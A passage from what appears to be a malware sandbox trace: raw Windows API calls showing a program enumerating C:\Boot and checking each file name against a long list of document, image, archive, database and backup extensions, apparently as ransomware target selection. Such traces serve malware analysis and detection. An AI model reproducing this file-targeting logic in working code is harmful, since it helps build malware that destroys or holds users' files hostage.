dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.048] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.048] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0285.048] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.049] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0285.049] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.049] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0285.049] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.049] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.049] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.049] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.050] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0285.050] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.050] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0285.050] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.050] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.051] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.051] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0285.051] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0285.051] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4025f98 [0285.052] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0285.053] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0285.053] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0285.053] lstrlenW (lpString="bootres.dll.mui") returned 15 [0285.053] lstrlenW (lpString=".1cd") returned 4 [0285.053] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.053] lstrlenW (lpString=".3ds") returned 4 [0285.053] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.053] lstrlenW (lpString=".3fr") returned 4 [0285.053] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.053] lstrlenW (lpString=".3g2") returned 4 [0285.053] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.053] lstrlenW (lpString=".3gp") returned 4 [0285.053] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.054] lstrlenW (lpString=".7z") returned 3 [0285.054] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.054] lstrlenW (lpString=".accda") returned 6 [0285.054] lstrcmpiW (lpString1=".accda", lpString2="ll.mui") returned -1 [0285.054] lstrlenW (lpString=".accdb") returned 6 [0285.054] lstrcmpiW (lpString1=".accdb", lpString2="ll.mui") returned -1 [0285.054] lstrlenW (lpString=".accdc") returned 6 [0285.054] lstrcmpiW (lpString1=".accdc", lpString2="ll.mui") returned -1 [0285.054] lstrlenW (lpString=".accde") returned 6 [0285.054] lstrcmpiW (lpString1=".accde", lpString2="ll.mui") returned -1 [0285.054] lstrlenW (lpString=".accdt") returned 6 [0285.054] lstrcmpiW (lpString1=".accdt", lpString2="ll.mui") returned -1 [0285.054] lstrlenW (lpString=".accdw") returned 6 [0285.054] lstrcmpiW (lpString1=".accdw", lpString2="ll.mui") returned -1 [0285.054] lstrlenW (lpString=".adb") returned 4 [0285.054] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.054] lstrlenW (lpString=".adp") returned 4 [0285.054] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.054] lstrlenW (lpString=".ai") returned 3 [0285.054] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.054] lstrlenW (lpString=".ai3") returned 4 [0285.054] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.054] lstrlenW (lpString=".ai4") returned 4 [0285.054] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.054] lstrlenW (lpString=".ai5") returned 4 [0285.054] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.054] lstrlenW (lpString=".ai6") returned 4 [0285.055] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".ai7") returned 4 [0285.055] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".ai8") returned 4 [0285.055] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".anim") returned 5 [0285.055] lstrcmpiW (lpString1=".anim", lpString2="l.mui") returned -1 [0285.055] lstrlenW (lpString=".arw") returned 4 [0285.055] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".as") returned 3 [0285.055] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.055] lstrlenW (lpString=".asa") returned 4 [0285.055] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".asc") returned 4 [0285.055] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".ascx") returned 5 [0285.055] lstrcmpiW (lpString1=".ascx", lpString2="l.mui") returned -1 [0285.055] lstrlenW (lpString=".asm") returned 4 [0285.055] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".asmx") returned 5 [0285.055] lstrcmpiW (lpString1=".asmx", lpString2="l.mui") returned -1 [0285.055] lstrlenW (lpString=".asp") returned 4 [0285.055] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".aspx") returned 5 [0285.055] lstrcmpiW (lpString1=".aspx", lpString2="l.mui") returned -1 [0285.055] lstrlenW (lpString=".asr") returned 4 [0285.055] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.055] lstrlenW (lpString=".asx") returned 4 [0285.056] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".avi") returned 4 [0285.056] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".avs") returned 4 [0285.056] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".backup") returned 7 [0285.056] lstrcmpiW (lpString1=".backup", lpString2="dll.mui") returned -1 [0285.056] lstrlenW (lpString=".bak") returned 4 [0285.056] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".bay") returned 4 [0285.056] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".bd") returned 3 [0285.056] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.056] lstrlenW (lpString=".bin") returned 4 [0285.056] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".bmp") returned 4 [0285.056] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".bz2") returned 4 [0285.056] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".c") returned 2 [0285.056] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.056] lstrlenW (lpString=".cdr") returned 4 [0285.056] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".cer") returned 4 [0285.056] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.056] lstrlenW (lpString=".cf") returned 3 [0285.056] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.056] lstrlenW (lpString=".cfc") returned 4 [0285.057] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".cfm") returned 4 [0285.057] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".cfml") returned 5 [0285.057] lstrcmpiW (lpString1=".cfml", lpString2="l.mui") returned -1 [0285.057] lstrlenW (lpString=".cfu") returned 4 [0285.057] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".chm") returned 4 [0285.057] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".cin") returned 4 [0285.057] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".class") returned 6 [0285.057] lstrcmpiW (lpString1=".class", lpString2="ll.mui") returned -1 [0285.057] lstrlenW (lpString=".clx") returned 4 [0285.057] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".config") returned 7 [0285.057] lstrcmpiW (lpString1=".config", lpString2="dll.mui") returned -1 [0285.057] lstrlenW (lpString=".cpp") returned 4 [0285.057] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".cr2") returned 4 [0285.057] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".crt") returned 4 [0285.057] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".crw") returned 4 [0285.057] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.057] lstrlenW (lpString=".cs") returned 3 [0285.057] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.058] lstrlenW (lpString=".css") returned 4 [0285.058] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".csv") returned 4 [0285.058] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".cub") returned 4 [0285.058] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dae") returned 4 [0285.058] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dat") returned 4 [0285.058] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".db") returned 3 [0285.058] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.058] lstrlenW (lpString=".dbf") returned 4 [0285.058] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dbx") returned 4 [0285.058] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dc3") returned 4 [0285.058] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dcm") returned 4 [0285.058] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dcr") returned 4 [0285.058] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".der") returned 4 [0285.058] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dib") returned 4 [0285.058] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.058] lstrlenW (lpString=".dic") returned 4 [0285.058] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".dif") returned 4 [0285.059] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".divx") returned 5 [0285.059] lstrcmpiW (lpString1=".divx", lpString2="l.mui") returned -1 [0285.059] lstrlenW (lpString=".djvu") returned 5 [0285.059] lstrcmpiW (lpString1=".djvu", lpString2="l.mui") returned -1 [0285.059] lstrlenW (lpString=".dng") returned 4 [0285.059] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".doc") returned 4 [0285.059] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".docm") returned 5 [0285.059] lstrcmpiW (lpString1=".docm", lpString2="l.mui") returned -1 [0285.059] lstrlenW (lpString=".docx") returned 5 [0285.059] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0285.059] lstrlenW (lpString=".dot") returned 4 [0285.059] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".dotm") returned 5 [0285.059] lstrcmpiW (lpString1=".dotm", lpString2="l.mui") returned -1 [0285.059] lstrlenW (lpString=".dotx") returned 5 [0285.059] lstrcmpiW (lpString1=".dotx", lpString2="l.mui") returned -1 [0285.059] lstrlenW (lpString=".dpx") returned 4 [0285.059] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".dqy") returned 4 [0285.059] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".dsn") returned 4 [0285.059] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.059] lstrlenW (lpString=".dt") returned 3 [0285.060] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.060] lstrlenW (lpString=".dtd") returned 4 [0285.060] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".dwg") returned 4 [0285.060] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".dwt") returned 4 [0285.060] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".dx") returned 3 [0285.060] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.060] lstrlenW (lpString=".dxf") returned 4 [0285.060] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".edml") returned 5 [0285.060] lstrcmpiW (lpString1=".edml", lpString2="l.mui") returned -1 [0285.060] lstrlenW (lpString=".efd") returned 4 [0285.060] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".elf") returned 4 [0285.060] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".emf") returned 4 [0285.060] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".emz") returned 4 [0285.060] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".epf") returned 4 [0285.060] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".eps") returned 4 [0285.060] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.060] lstrlenW (lpString=".epsf") returned 5 [0285.060] lstrcmpiW (lpString1=".epsf", lpString2="l.mui") returned -1 [0285.061] lstrlenW (lpString=".epsp") returned 5 [0285.061] lstrcmpiW (lpString1=".epsp", lpString2="l.mui") returned -1 [0285.061] lstrlenW (lpString=".erf") returned 4 [0285.061] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".exr") returned 4 [0285.061] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".f4v") returned 4 [0285.061] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".fido") returned 5 [0285.061] lstrcmpiW (lpString1=".fido", lpString2="l.mui") returned -1 [0285.061] lstrlenW (lpString=".flm") returned 4 [0285.061] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".flv") returned 4 [0285.061] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".frm") returned 4 [0285.061] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".fxg") returned 4 [0285.061] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".geo") returned 4 [0285.061] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".gif") returned 4 [0285.061] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".grs") returned 4 [0285.061] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.061] lstrlenW (lpString=".gz") returned 3 [0285.061] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.061] lstrlenW (lpString=".h") returned 2 [0285.061] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.061] lstrlenW (lpString=".hdr") returned 4 [0285.062] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".hpp") returned 4 [0285.062] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".hta") returned 4 [0285.062] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".htc") returned 4 [0285.062] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".htm") returned 4 [0285.062] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".html") returned 5 [0285.062] lstrcmpiW (lpString1=".html", lpString2="l.mui") returned -1 [0285.062] lstrlenW (lpString=".icb") returned 4 [0285.062] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".ics") returned 4 [0285.062] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".iff") returned 4 [0285.062] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".inc") returned 4 [0285.062] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".indd") returned 5 [0285.062] lstrcmpiW (lpString1=".indd", lpString2="l.mui") returned -1 [0285.062] lstrlenW (lpString=".ini") returned 4 [0285.062] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".iqy") returned 4 [0285.062] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.062] lstrlenW (lpString=".j2c") returned 4 [0285.062] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".j2k") returned 4 [0285.063] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".java") returned 5 [0285.063] lstrcmpiW (lpString1=".java", lpString2="l.mui") returned -1 [0285.063] lstrlenW (lpString=".jp2") returned 4 [0285.063] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".jpc") returned 4 [0285.063] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".jpe") returned 4 [0285.063] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".jpeg") returned 5 [0285.063] lstrcmpiW (lpString1=".jpeg", lpString2="l.mui") returned -1 [0285.063] lstrlenW (lpString=".jpf") returned 4 [0285.063] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".jpg") returned 4 [0285.063] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".jpx") returned 4 [0285.063] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".js") returned 3 [0285.063] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.063] lstrlenW (lpString=".jsf") returned 4 [0285.063] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".json") returned 5 [0285.063] lstrcmpiW (lpString1=".json", lpString2="l.mui") returned -1 [0285.063] lstrlenW (lpString=".jsp") returned 4 [0285.063] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.063] lstrlenW (lpString=".kdc") returned 4 [0285.064] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".kmz") returned 4 [0285.064] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".kwm") returned 4 [0285.064] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".lasso") returned 6 [0285.064] lstrcmpiW (lpString1=".lasso", lpString2="ll.mui") returned -1 [0285.064] lstrlenW (lpString=".lbi") returned 4 [0285.064] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".lgf") returned 4 [0285.064] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".lgp") returned 4 [0285.064] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 